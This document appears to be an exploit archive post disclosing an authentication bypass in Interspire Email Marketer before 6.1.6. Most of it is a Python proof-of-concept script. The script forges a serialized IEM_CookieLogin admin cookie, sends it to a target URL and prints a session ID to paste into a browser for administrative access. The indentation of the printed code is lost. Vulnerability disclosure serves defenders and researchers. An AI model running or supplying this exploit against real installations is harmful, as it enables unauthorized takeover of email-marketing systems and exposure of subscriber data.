The function in charge of checking whether the user is already logged in init.php in Interspire Email Marketer (IEM) prior to 6.1.6 allows remote attackers to bypass authentication and obtain administrative access by using the IEM_CookieLogin cookie with a specially crafted value. On top of that, if the customer doesn’t have an annuel maintenance plan, the application says that it’s on the last available version and there is no update.
The vulnerabilities were found during an incident response on a compromise instance of the application.
Proof of Concept:
Details provided here : https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html#### Usage Info
python magic_cookie.py url
import requests
import sys
def cookie_cutter(url):
with requests.Session() as s:
s.get(url)
r = s.get(url)
response_regex = r.text
print("requesting initial Cookie\n")
print(str(r.headers)+"\n")
for key,value in s.cookies.items():
if "IEMSESSIONID" in key:
print "Key:"+key +",Value:" + value
print "-" * 25
print "forging Admin cookie"+"\n"
print "-" * 25
s.cookies.set('IEM_CookieLogin', "YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D")
for key,value in s.cookies.items():
print "Key:"+key +",Value:" + value
print "-" * 25
if "IEMSESSIONID" in key:
session_rider = value
print "Making 2nd request with Forged Cookie\n"
print "-" * 25
r = s.get(url)
response_regex2 = r.text
if response_regex != response_regex2:
print "Response Headers"+"\n"
print "-" * 25
print(str(r.headers)+"\n")
print "-" * 25
print "Response Status Code"+"\n"
print str(r.status_code)+"\n"
print "-" * 25
print response_regex2+"\n"
print "-" * 25
return session_rider
def main():
url = sys.argv[1]
print url
session_rider_value = cookie_cutter(url)
print "Magic Cookie Generated Modify Existing IEMSESSIONID Value In browser With Below Value "
print "-" * 25
print session_rider_value +"\n"
print "-" * 25
main()
# 0day.today [2018-04-23] #